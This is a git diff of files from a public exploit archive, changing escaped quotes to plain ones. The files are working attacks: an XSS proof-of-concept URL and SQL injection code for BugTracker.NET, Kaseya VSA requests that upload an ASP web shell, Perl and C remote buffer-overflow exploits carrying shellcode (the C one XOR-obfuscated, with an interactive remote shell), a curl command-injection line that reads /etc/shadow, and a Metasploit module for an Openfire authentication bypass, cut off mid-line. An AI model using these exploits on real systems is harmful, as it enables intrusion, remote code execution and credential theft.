diff --git a/platforms/asp/webapps/15653.txt b/platforms/asp/webapps/15653.txt index e7545dcb6..a8fcd1494 100755 --- a/platforms/asp/webapps/15653.txt +++ b/platforms/asp/webapps/15653.txt @@ -34,9 +34,9 @@ scripting and SQL-injection vulnerabilities were found in the following files of the BugTracker.NET: . *bugs.aspx*. SQL injection in line 141. - . *delete_query.aspx*. No sanitization for \'row_id.Value\' in line 30. + . *delete_query.aspx*. No sanitization for 'row_id.Value' in line 30. . *edit_bug.aspx*. Variables without sanitization in lines 1846 and 1857. - . *edit_bug.aspx*. No sanitization for variable \'new_project\', line 2214. + . *edit_bug.aspx*. No sanitization for variable 'new_project', line 2214. . *edit_bug.aspx*. XSS in line 2918. . *edit_comment.aspx*. XSS in line 233. . *edit_customfield.aspx*. Lines 165 and 172, no sanitization. @@ -68,7 +68,7 @@ and Alejandro Frydman from Core Security Technologies. [CVE-2010-3266 | N/A]. All XSS vulnerabilities can be exploited in similar ways. The following proof of concept shows how to exploit the -XSS founded in \'edit_comment.aspx\': +XSS founded in 'edit_comment.aspx': /----- ... @@ -76,9 +76,9 @@ XSS founded in \'edit_comment.aspx\': 231
232 233 >back to <% -Response.Write(btnet.Util.get_setting(\"SingularBugLabel\",\"bug\")); %> -234
+Response.Write(Request["bug_id"]);%>>back to <% +Response.Write(btnet.Util.get_setting("SingularBugLabel","bug")); %> +234 235 236 ... @@ -89,30 +89,30 @@ bug. Then, edit it using this URL: /----- http://localhost:4535/edit_comment.aspx?id=48&bug_id=3%3E%3Cscript%3Ealert%28%27%27%29;%3C/script%3E -----/ - As a result, the JavaScript code injected into the parameter \'bug_id\' + As a result, the JavaScript code injected into the parameter 'bug_id' will be rendered without sanitization in the line 233, and executed in -the context of the client\'s web browser. +the context of the client's web browser. 7.2. *SQL Injection Vulnerabilities* [CVE-2010-3267 | N/A]. All SQL injection vulnerabilities can also be exploited in similar ways. Consider, for example, the code located in -\'delete_query.aspx\': +'delete_query.aspx': /----- ... 26 if (IsPostBack) 27 { 28 // do delete here -29 sql = @\"delete queries where qu_id = $1\"; -30 sql = sql.Replace(\"$1\", row_id.Value); +29 sql = @"delete queries where qu_id = $1"; +30 sql = sql.Replace("$1", row_id.Value); 31 btnet.DbUtil.execute_nonquery(sql); -32 Server.Transfer (\"queries.aspx\"); +32 Server.Transfer ("queries.aspx"); 33 } ... -----/ - In line 30, the value of \'row_id\' is injected without sanitization into + In line 30, the value of 'row_id' is injected without sanitization into the SQL query. This value arrives to the server in a hidden field of a client request. As a result, a malicious user can manipulate this value in order to execute code in the database layer of the application. @@ -170,7 +170,7 @@ project information and shared software tools for public use at: Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a -proactive process for securing their networks. The company\'s flagship +proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are diff --git a/platforms/asp/webapps/38351.txt b/platforms/asp/webapps/38351.txt index 5d4650fff..ababc1a0b 100755 --- a/platforms/asp/webapps/38351.txt +++ b/platforms/asp/webapps/38351.txt @@ -1,7 +1,7 @@ Kaseya VSA is an IT management platform for small and medium corporates. From its console you can control thousands of computers and mobile devices. So that if you own the Kaseya server, you own the organisation. -With this post I\'m also releasing two Metasploit modules ([E1], [E2]) +With this post I'm also releasing two Metasploit modules ([E1], [E2]) and a Ruby file ([E3]) that exploit the vulnerabilities described below. A special thanks to ZDI for assisting with the disclosure of these @@ -28,12 +28,12 @@ Security (http://www.agileinfosec.co.uk/) Disclosure: 23/09/2015 / Last updated: 28/09/2015 >> Background on the affected product: -\"Kaseya VSA is an integrated IT Systems Management platform that can be +"Kaseya VSA is an integrated IT Systems Management platform that can be leveraged seamlessly across IT disciplines to streamline and automate your IT services. Kaseya VSA integrates key management capabilities into a single platform. Kaseya VSA makes your IT staff more productive, your services more reliable, your systems more secure, and your value easier -to show.\" +to show." A special thanks to ZDI for assisting with the vulnerability reporting process. @@ -52,7 +52,7 @@ VSA Version 9.0.0.0 â?? 9.0.0.18 VSA Version 9.1.0.0 â?? 9.1.0.8 GET /LocalAuth/setAccount.aspx -Page will attempt to redirect, ignore this and obtain the \"sessionVal\" +Page will attempt to redirect, ignore this and obtain the "sessionVal" value from the page which will be used in the following POST request. POST /LocalAuth/setAccount.aspx @@ -85,7 +85,7 @@ Cookie: sessionId= <... ASP shell here...> The path needs to be correct, but Kaseya is helpful enough to let us -know when a path doesn\'t exist. +know when a path doesn't exist. A Metasploit module that exploits this vulnerability has been released. #3 @@ -108,20 +108,20 @@ boundary=---------------------------114052411119142 Content-Length: 1501 -----------------------------114052411119142 -Content-Disposition: form-data; name=\"directory\" +Content-Disposition: form-data; name="directory" ../WebPages -----------------------------114052411119142 -Content-Disposition: form-data; name=\"ReferringWebWindowId\" +Content-Disposition: form-data; name="ReferringWebWindowId" 31a5d16a-01b7-4f8d-adca-0b2e70006dfa -----------------------------114052411119142 -Content-Disposition: form-data; name=\"request\" +Content-Disposition: form-data; name="request" uploadFile -----------------------------114052411119142 -Content-Disposition: form-data; name=\"impinf__uploadfilelocation\"; -filename=\"shell.asp\" +Content-Disposition: form-data; name="impinf__uploadfilelocation"; +filename="shell.asp" Content-Type: application/octet-stream <... ASP shell here...> diff --git a/platforms/bsd/remote/105.pl b/platforms/bsd/remote/105.pl index 526b893f4..b656f7eb0 100755 --- a/platforms/bsd/remote/105.pl +++ b/platforms/bsd/remote/105.pl @@ -5,37 +5,37 @@ use IO::Socket; if(!$ARGV[1]) -{ print \"usage: ./DSR-cfengine.pl (default cfengine is 5308)\\n\"; exit(-1); } +{ print "usage: ./DSR-cfengine.pl (default cfengine is 5308)\n"; exit(-1); } $host = $ARGV[0]; $port = $ARGV[1]; -$nop = \"\\x90\"; -$ret = pack(\"l\",0xbfafe3dc); +$nop = "\x90"; +$ret = pack("l",0xbfafe3dc); $shellcode = -\"\\x31\\xc0\\x31\\xdb\\x53\\xb3\\x06\\x53\\xb3\\x01\\x53\\xb3\\x02\\x53\\x54\\xb0\". -\"\\x61\\xcd\\x80\\x89\\xc7\\x31\\xc0\\x50\\x50\\x50\\x66\\x68\\xb0\\xef\\xb7\\x02\". -\"\\x66\\x53\\x89\\xe1\\x31\\xdb\\xb3\\x10\\x53\\x51\\x57\\x50\\xb0\\x68\\xcd\\x80\". -\"\\x31\\xdb\\x39\\xc3\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x50\\x57\". -\"\\x50\\xb0\\x6a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x50\\x89\\xe1\\xb3\\x01\\x53\\x89\". -\"\\xe2\\x50\\x51\\x52\\xb3\\x14\\x53\\x50\\xb0\\x2e\\xcd\\x80\\x31\\xc0\\x50\\x50\". -\"\\x57\\x50\\xb0\\x1e\\xcd\\x80\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\\xcd\\x80\". -\"\\x39\\xc3\\x75\\x44\\x31\\xc0\\x57\\x50\\xb0\\x06\\xcd\\x80\\x31\\xc0\\x50\\x56\". -\"\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\". -\"\\x80\\x31\\xc0\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x50\\x68\\x2f\". -\"\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x54\\x53\\x50\\xb0\\x3b\". -\"\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x56\\x50\\xb0\\x06\\xcd\\x80\". -\"\\xeb\\x9a\"; +"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0". +"\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02". +"\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80". +"\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57". +"\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89". +"\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50". +"\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80". +"\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56". +"\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd". +"\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f". +"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b". +"\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80". +"\xeb\x9a"; $buf = $nop x 2222 . $shellcode . $ret x 500; $socket = new IO::Socket::INET ( -Proto => \"tcp\", +Proto => "tcp", PeerAddr => $host, PeerPort => $port, ); -die \"unable to connect to $host:$port ($!)\\n\" unless $socket; +die "unable to connect to $host:$port ($!)\n" unless $socket; sleep(1); #you might have to adjust this on slow connections print $socket $buf; diff --git a/platforms/bsd/remote/234.c b/platforms/bsd/remote/234.c index f371c9141..4bed46335 100755 --- a/platforms/bsd/remote/234.c +++ b/platforms/bsd/remote/234.c @@ -40,22 +40,22 @@ int verbose = 0; /* - Written by dvorak, garbled up by \"Smegma\" with a word xor 0xaabb mask + Written by dvorak, garbled up by "Smegma" with a word xor 0xaabb mask to get rid of dots and slashes. */ char heavenlycode[] = -\"\\x31\\xc0\\x89\\xc1\\x80\\xc1\\x02\\x51\\x50\\x04\\x5a\\x50\\xcd\\x80\" -\"\\xeb\\x10\\x5e\\x31\\xc9\\xb1\\x4a\\x66\\x81\\x36\\xbb\\xaa\\x46\\x46\\xe2\\xf7\\xeb\\x05\\xe8\\xeb\\xff\\xff\\xff\\xff\\xff\\xff\\x50\\xcf\\xe5\\x9b\\x7b\\xf -a\\xbf\\xbd\\xeb\\x67\\x3b\\xfc\\x8a\\x6a\\x33\\xec\\xba\\xae\\x33\\xfa\\x76\\x2a\\x8a\\x6a\\xeb\\x22\\xfd\\xb5\\x36\\xf4\\xa5\\xf9\\xbf\\xaf\\xeb\\x67\\x3b\\x2 -3\\x7a\\xfc\\x8a\\x6a\\xbf\\x97\\xeb\\x67\\x3b\\xfb\\x8a\\x6a\\xbf\\xa4\\xf3\\xfa\\x76\\x2a\\x36\\xf4\\xb9\\xf9\\x8a\\x6a\\xbf\\xa6\\xeb\\x67\\x3b\\x27\\xe5\\xb -4\\xe8\\x9b\\x7b\\xae\\x86\\xfa\\x76\\x2a\\x8a\\x6a\\xeb\\x22\\xfd\\x8d\\x36\\xf4\\x93\\xf9\\x36\\xf4\\x9b\\x23\\xe5\\x82\\x32\\xec\\x97\\xf9\\xbf\\x91\\xeb\\x6 -7\\x3b\\x42\\x2d\\x55\\x44\\x55\\xfa\\xeb\\x95\\x84\\x94\\x84\\x95\\x85\\x95\\x84\\x94\\x84\\x95\\x85\\x95\\x84\\x94\\x84\\x95\\x85\\x95\\x84\\x94\\x84\\x95\\x8 -5\\x95\\x84\\x94\\x84\\x95\\xeb\\x94\\xc8\\xd2\\xc4\\x94\\xd9\\xd3\"; +"\x31\xc0\x89\xc1\x80\xc1\x02\x51\x50\x04\x5a\x50\xcd\x80" +"\xeb\x10\x5e\x31\xc9\xb1\x4a\x66\x81\x36\xbb\xaa\x46\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xff\xff\xff\x50\xcf\xe5\x9b\x7b\xf +a\xbf\xbd\xeb\x67\x3b\xfc\x8a\x6a\x33\xec\xba\xae\x33\xfa\x76\x2a\x8a\x6a\xeb\x22\xfd\xb5\x36\xf4\xa5\xf9\xbf\xaf\xeb\x67\x3b\x2 +3\x7a\xfc\x8a\x6a\xbf\x97\xeb\x67\x3b\xfb\x8a\x6a\xbf\xa4\xf3\xfa\x76\x2a\x36\xf4\xb9\xf9\x8a\x6a\xbf\xa6\xeb\x67\x3b\x27\xe5\xb +4\xe8\x9b\x7b\xae\x86\xfa\x76\x2a\x8a\x6a\xeb\x22\xfd\x8d\x36\xf4\x93\xf9\x36\xf4\x9b\x23\xe5\x82\x32\xec\x97\xf9\xbf\x91\xeb\x6 +7\x3b\x42\x2d\x55\x44\x55\xfa\xeb\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x95\x8 +5\x95\x84\x94\x84\x95\xeb\x94\xc8\xd2\xc4\x94\xd9\xd3"; -char user[255] = \"anonymous\"; -char pass[255] = \"anonymous@abc.com\"; -char write_dir[PATH_MAX] = \"/\"; +char user[255] = "anonymous"; +char pass[255] = "anonymous@abc.com"; +char write_dir[PATH_MAX] = "/"; int ftpport = 21; unsigned long int ret_addr = 0; #define CMD_LOCAL 0 @@ -70,24 +70,24 @@ struct typeT { #define NUM_TYPES 2 struct typeT types[NUM_TYPES] = { - \"OpenBSD 2.6\", 0xdfbfd0ac, - \"OpenBSD 2.7\", 0xdfbfd0ac}; + "OpenBSD 2.6", 0xdfbfd0ac, + "OpenBSD 2.7", 0xdfbfd0ac}; void usage(char *program) { int i; fprintf(stderr, - \"\\nUsage: %s [-h host] [-f port] [-u user] [-p pass] [-d directory] [-t type]\\n\\t\\t[-r retaddr] [-c command] -[-C command]\\n\\n\" - \"Directory should be an absolute path, writable by the user.\\n\" - \"The argument of -c will be executed on the remote host\\n\" - \"while the argument of -C will be executed on the local\\n\" - \"with its filedescriptors connected to the remote host\\n\" - \"Valid types:\\n\", + "\nUsage: %s [-h host] [-f port] [-u user] [-p pass] [-d directory] [-t type]\n\t\t[-r retaddr] [-c command] +[-C command]\n\n" + "Directory should be an absolute path, writable by the user.\n" + "The argument of -c will be executed on the remote host\n" + "while the argument of -C will be executed on the local\n" + "with its filedescriptors connected to the remote host\n" + "Valid types:\n", program); for (i = 0; i < NUM_TYPES; i++) { - printf(\"%d : %s\\n\", i, types[i].name); + printf("%d : %s\n", i, types[i].name); } exit(-1); } @@ -98,54 +98,54 @@ main(int argc, char **argv) unsigned int i; int opt, fd; unsigned int type = 0; - char *hostname = \"localhost\"; + char *hostname = "localhost"; if (argc < 2) usage(argv[0]); - while ((opt = getopt(argc, argv, \"h:r:u:f:d:t:vp:c:C:\")) != -1) { + while ((opt = getopt(argc, argv, "h:r:u:f:d:t:vp:c:C:")) != -1) { switch (opt) { - case \'h\': + case 'h': hostname = optarg; break; - case \'C\': + case 'C': command = optarg; command_type = CMD_LOCAL; break; - case \'c\': + case 'c': command = optarg; command_type = CMD_REMOTE; break; - case \'r\': + case 'r': ret_addr = strtoul(optarg, NULL, 0); break; - case \'v\': + case 'v': verbose++; break; - case \'f\': + case 'f': if (!(ftpport = atoi(optarg))) { - fprintf(stderr, \"Invalid destination port - %s\\n\", optarg); + fprintf(stderr, "Invalid destination port - %s\n", optarg); exit(-1); } exit(-1); break; - case \'u\': + case 'u': strncpy(user, optarg, sizeof(user) - 1); user[sizeof(user) - 1] = 0x00; break; - case \'p\': + case 'p': strncpy(pass, optarg, sizeof(pass) - 1); pass[sizeof(pass) - 1] = 0x00; break; - case \'d\': + case 'd': strncpy(write_dir, optarg, sizeof(write_dir) - 1); write_dir[sizeof(write_dir) - 1] = 0x00; - if ((write_dir[0] != \'/\')) + if ((write_dir[0] != '/')) usage(argv[0]); - if ((write_dir[strlen(write_dir) - 1] != \'/\')) - strncat(write_dir, \"/\", sizeof(write_dir) - 1); + if ((write_dir[strlen(write_dir) - 1] != '/')) + strncat(write_dir, "/", sizeof(write_dir) - 1); break; - case \'t\': + case 't': type = atoi(optarg); if (type > NUM_TYPES) usage(argv[0]); @@ -160,7 +160,7 @@ main(int argc, char **argv) if ((fd = xconnect(hostname, ftpport)) == -1) exit(-1); else - printf(\"Connected to remote host! Sending evil codes.\\n\"); + printf("Connected to remote host! Sending evil codes.\n"); ftp_login(fd, user, pass); @@ -178,19 +178,19 @@ ftp_cmd_err(int fd, char *command, char *param, char *res, int size, char * msg) if (res == NULL) return 0; if (verbose) - printf(\"%s\\n\", res); - if (msg && (res[0] != \'2\')) { - fprintf(stderr, \"%s\\n\", msg); + printf("%s\n", res); + if (msg && (res[0] != '2')) { + fprintf(stderr, "%s\n", msg); exit(-1); } - return (res[0] != \'2\'); + return (res[0] != '2'); } void shell(int fd) { fd_set readfds; char buf[1]; - char *tst = \"echo ; echo ; echo HAVE FUN ; id ; uname -a\\n\"; + char *tst = "echo ; echo ; echo HAVE FUN ; id ; uname -a\n"; write(fd, tst, strlen(tst)); while (1) { @@ -200,14 +200,14 @@ void shell(int fd) select(fd + 1, &readfds, NULL, NULL, NULL); if (FD_ISSET(0, &readfds)) { if (read(0, buf, 1) != 1) { - perror(\"read\"); + perror("read"); exit(1); } write(fd, buf, 1); } if (FD_ISSET(fd, &readfds)) { if (read(fd, buf, 1) != 1) { - perror(\"read\"); + perror("read"); exit(1); } write(1, buf, 1); @@ -228,7 +228,7 @@ void do_command(int fd) exit (2); } write(fd, command, strlen(command)); - write(fd, \"\\n\", 1); + write(fd, "\n", 1); while ((len = read(fd, buffer, sizeof(buffer))) > 0) { write(1, buffer, len); } @@ -242,10 +242,10 @@ void execute_command(fd) int exploit_ok(int fd) { char result[1024]; - xsend(fd, \"id\\n\"); + xsend(fd, "id\n"); xrecieve(fd, result, sizeof(result)); - return (strstr(result, \"uid=\") != NULL); + return (strstr(result, "uid=") != NULL); } void exploit(int fd) @@ -254,49 +254,49 @@ void exploit(int fd) int heavenlycode_s; char *dir = NULL; - ftp_cmd_err(fd, \"CWD\", write_dir, res, 1024, \"Can\'t CWD to write_dir\"); + ftp_cmd_err(fd, "CWD", write_dir, res, 1024, "Can't CWD to write_dir"); - dir = strcreat(dir, \"A\", 255 - strlen(write_dir)); - ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL); - ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\"); + dir = strcreat(dir, "A", 255 - strlen(write_dir)); + ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL); + ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory"); xfree(&dir); /* next on = 256 */ - dir = strcreat(dir, \"A\", 255); - ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL); - ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\"); + dir = strcreat(dir, "A", 255); + ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL); + ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory"); xfree(&dir); /* next on = 512 */ heavenlycode_s = strlen(heavenlycode); - dir = strcreat(dir, \"A\", 254 - heavenlycode_s); + dir = strcreat(dir, "A", 254 - heavenlycode_s); dir = strcreat(dir, heavenlycode, 1); - ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL); - ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\"); + ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL); + ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory"); xfree(&dir); /* next on = 768 */ dir = strcreat(dir, longToChar(ret_addr), 252 / 4); - ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL); - ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\"); + ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL); + ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory"); xfree(&dir); /* length = 1020 */ - /* 1022 moet \" zijn */ - dir = strcreat(dir, \"AAA\\\"\", 1); - ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL); - ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\"); + /* 1022 moet " zijn */ + dir = strcreat(dir, "AAA\"", 1); + ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL); + ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory"); xfree(&dir); /* and tell it to blow up */ - ftp_cmd_err(fd, \"PWD\", NULL, res, 1024, NULL); + ftp_cmd_err(fd, "PWD", NULL, res, 1024, NULL); if (!exploit_ok(fd)) { if (command != NULL) { exit (2); } - fprintf(stderr, \"Exploit failed\\n\"); + fprintf(stderr, "Exploit failed\n"); exit (1); } if (command == NULL) @@ -346,7 +346,7 @@ xrealloc(void *ptr, size_t size) char *wittgenstein_was_a_drunken_swine; if (!(wittgenstein_was_a_drunken_swine = (char *) realloc(ptr, size))) { - fprintf(stderr, \"Cannot calculate universe\\n\"); + fprintf(stderr, "Cannot calculate universe\n"); exit(-1); } return (wittgenstein_was_a_drunken_swine); @@ -367,7 +367,7 @@ xmalloc(size_t size) char *heidegger_was_a_boozy_beggar; if (!(heidegger_was_a_boozy_beggar = (char *) malloc(size))) { - fprintf(stderr, \"Out of cheese error\\n\"); + fprintf(stderr, "Out of cheese error\n"); exit(-1); } return (heidegger_was_a_boozy_beggar); @@ -382,7 +382,7 @@ xconnect(char *host, u_short port) int fd; if ((he = gethostbyname(host)) == NULL) { - perror(\"gethostbyname\"); + perror("gethostbyname"); return (-1); } memset(&s_in, 0, sizeof(s_in)); @@ -391,11 +391,11 @@ xconnect(char *host, u_short port) memcpy(&s_in.sin_addr.s_addr, he->h_addr, he->h_length); if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { - perror(\"socket\"); + perror("socket"); return (-1); } if (connect(fd, (const struct sockaddr *) & s_in, sizeof(s_in)) == -1) { - perror(\"connect\"); + perror("connect"); return (-1); } return fd; @@ -409,20 +409,20 @@ ftp_login(int fd, char *user, char *password) int rep; xrecieveall(fd, reply, sizeof(reply)); if (verbose) { - printf(\"Logging in ..\\n\"); - printf(\"%s\\n\", reply); + printf("Logging in ..\n"); + printf("%s\n", reply); } - xsendftpcmd(fd, \"USER\", user); + xsendftpcmd(fd, "USER", user); xrecieveall(fd, reply, sizeof(reply)); if (verbose) - printf(\"%s\\n\", reply); - xsendftpcmd(fd, \"PASS\", password); + printf("%s\n", reply); + xsendftpcmd(fd, "PASS", password); xrecieveall(fd, reply, sizeof(reply)); if (verbose) - printf(\"%s\\n\", reply); + printf("%s\n", reply); - if (reply[0] != \'2\') { - printf(\"Login failed.\\n\"); + if (reply[0] != '2') { + printf("Login failed.\n"); exit(-1); } } @@ -433,10 +433,10 @@ xsendftpcmd(int fd, char *command, char *param) xsend(fd, command); if (param != NULL) { - xsend(fd, \" \"); + xsend(fd, " "); xsend(fd, param); } - xsend(fd, \"\\r\\n\"); + xsend(fd, "\r\n"); } @@ -445,7 +445,7 @@ xsend(int fd, char *buf) { if (send(fd, buf, strlen(buf), 0) != strlen(buf)) { - perror(\"send\"); + perror("send"); exit(-1); } } @@ -462,7 +462,7 @@ xrecieveall(int fd, char *buf, int size) memset(buf, 0, size); do { xrecieve(fd, buf, size); - } while (buf[3] == \'-\'); + } while (buf[3] == '-'); } /* recieves a line from the ftpd */ void @@ -475,25 +475,25 @@ xrecieve(int fd, char *buf, int size) while (buf < end) { if (read(fd, buf, 1) != 1) { - perror(\"read\"); /* XXX */ + perror("read"); /* XXX */ exit(-1); } - if (buf[0] == \'\\n\') { - buf[0] = \'\\0\'; + if (buf[0] == '\n') { + buf[0] = '\0'; return; } - if (buf[0] != \'\\r\') { + if (buf[0] != '\r') { buf++; } } buf--; while (read(fd, buf, 1) == 1) { - if (buf[0] == \'\\n\') { - buf[0] = \'\\0\'; + if (buf[0] == '\n') { + buf[0] = '\0'; return; } } - perror(\"read\"); /* XXX */ + perror("read"); /* XXX */ exit(-1); } diff --git a/platforms/cgi/webapps/39145.txt b/platforms/cgi/webapps/39145.txt index 7ec647e52..6582617ad 100755 --- a/platforms/cgi/webapps/39145.txt +++ b/platforms/cgi/webapps/39145.txt @@ -6,7 +6,7 @@ An attacker may leverage this issue to execute arbitrary commands in the context Xangati XSR prior to 11 and XNR prior to 7 are vulnerable. -curl -i -s -k -X \'POST\' \\ --H \'Content-Type: application/x-www-form-urlencoded\' -H \'User-Agent: Java/1.7.0_25\' \\ ---data-binary $\'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F¶ms=gui_input_test.pl¶ms=-p+localhost;CMD%3d$\\\'cat\\\\x20/etc/shadow\\\';$CMD;+YES\' \\ -\'hxxps://www.example.com/servlet/Installer\' +curl -i -s -k -X 'POST' \ +-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \ +--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F¶ms=gui_input_test.pl¶ms=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \ +'hxxps://www.example.com/servlet/Installer' diff --git a/platforms/jsp/webapps/19432.rb b/platforms/jsp/webapps/19432.rb index 1bcc10e8f..3470f9012 100755 --- a/platforms/jsp/webapps/19432.rb +++ b/platforms/jsp/webapps/19432.rb @@ -5,8 +5,8 @@ # http://metasploit.com/framework/ ## -require \'msf/core\' -require \'rex/zip\' +require 'msf/core' +require 'rex/zip' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking @@ -18,8 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - \'Name\' => \'Openfire Admin Console Authentication Bypass\', - \'Description\' => %q{ + 'Name' => 'Openfire Admin Console Authentication Bypass', + 'Description' => %q{ This module exploits an authentication bypass vulnerability in the administration console of Openfire servers. By using this vulnerability it is possible to upload/execute a malicious Openfire plugin on the server and execute arbitrary Java @@ -29,102 +29,102 @@ class Metasploit3 < Msf::Exploit::Remote the server in some kind of unstable state, making re-exploitation difficult. You might want to do this manually. }, - \'Author\' => + 'Author' => [ - \'Andreas Kurtz\', # Vulnerability discovery - \'h0ng10\' # Metasploit module + 'Andreas Kurtz', # Vulnerability discovery + 'h0ng10' # Metasploit module ], - \'License\' => MSF_LICENSE, - \'References\' => + 'License' => MSF_LICENSE, + 'References' => [ - [ \'CVE\', \'2008-6508\' ], - [ \'OSVDB\', \'49663\' ], - [ \'BID\', \'32189\' ], - [ \'EDB\', \'7075\' ], - [ \'URL\', \'http://community.igniterealtime.org/thread/35874\' ] + [ 'CVE', '2008-6508' ], + [ 'OSVDB', '49663' ], + [ 'BID', '32189' ], + [ 'EDB', '7075' ], + [ 'URL', 'http://community.igniterealtime.org/thread/35874' ] ], - \'DisclosureDate\' => \'Nov 10 2008\', - \'Privileged\' => true, - \'Platform\' => [\'java\', \'win\', \'linux\' ], - \'Stance\' => Msf::Exploit::Stance::Aggressive, - \'Targets\' => + 'DisclosureDate' => 'Nov 10 2008', + 'Privileged' => true, + 'Platform' => ['java', 'win', 'linux' ], + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'Targets' => [ # # Java version # - [ \'Java Universal\', + [ 'Java Universal', { - \'Arch\' => ARCH_JAVA, - \'Platform\' => \'java\' + 'Arch' => ARCH_JAVA, + 'Platform' => 'java' } ], # # Platform specific targets # - [ \'Windows x86 (Native Payload)\', + [ 'Windows x86 (Native Payload)', { - \'Platform\' => \'win\', - \'Arch\' => ARCH_X86, + 'Platform' => 'win', + 'Arch' => ARCH_X86, } ], - [ \'Linux x86 (Native Payload)\', + [ 'Linux x86 (Native Payload)', { - \'Platform\' => \'linux\', - \'Arch\' => ARCH_X86, + 'Platform' => 'linux', + 'Arch' => ARCH_X86, } ] ], - \'DefaultTarget\' => 0, + 'DefaultTarget' => 0, )) register_options( [ Opt::RPORT(9090), - OptString.new(\'TARGETURI\', [true, \'The base path to the web application\', \'/\']), - OptString.new(\'PLUGINNAME\', [ false, \'Openfire plugin base name, (default: random)\' ]), - OptString.new(\'PLUGINAUTHOR\',[ false, \'Openfire plugin author, (default: random)\' ]), - OptString.new(\'PLUGINDESC\', [ false, \'Openfire plugin description, (default: random)\' ]), - OptBool.new(\'REMOVE_PLUGIN\', [ false, \'Try to remove the plugin after installation\', false ]), + OptString.new('TARGETURI', [true, 'The base path to the web application', '/']), + OptString.new('PLUGINNAME', [ false, 'Openfire plugin base name, (default: random)' ]), + OptString.new('PLUGINAUTHOR',[ false, 'Openfire plugin author, (default: random)' ]), + OptString.new('PLUGINDESC', [ false, 'Openfire plugin description, (default: random)' ]), + OptBool.new('REMOVE_PLUGIN', [ false, 'Try to remove the plugin after installation', false ]), ], self.class) end def check base = target_uri.path - base << \'/\' if base[-1, 1] != \'/\' + base << '/' if base[-1, 1] != '/' - path = \"#{base}login.jsp\" + path = "#{base}login.jsp" res = send_request_cgi( { - \'uri\' => path + 'uri' => path }) if (not res) or (res.code != 200) - print_error(\"Unable to make a request to: #{path}\") + print_error("Unable to make a request to: #{path}") return Exploit::CheckCode::Unknown end - versioncheck = res.body =~ /Openfire, \\D*: (\\d)\\.(\\d).(\\d)\\s*<\\/div>/ + versioncheck = res.body =~ /Openfire, \D*: (\d)\.(\d).(\d)\s*<\/div>/ if versioncheck.nil? then - print_error(\"Unable to detect Openfire version\") + print_error("Unable to detect Openfire version") return Exploit::CheckCode::Unknown end - print_status(\"Detected version: #{$1}.#{$2}.#{$3}\") - version = \"#{$1}#{$2}#{$3}\".to_i + print_status("Detected version: #{$1}.#{$2}.#{$3}") + version = "#{$1}#{$2}#{$3}".to_i return Exploit::CheckCode::Safe if version > 360 # Just to be sure, try to access the log page - path = 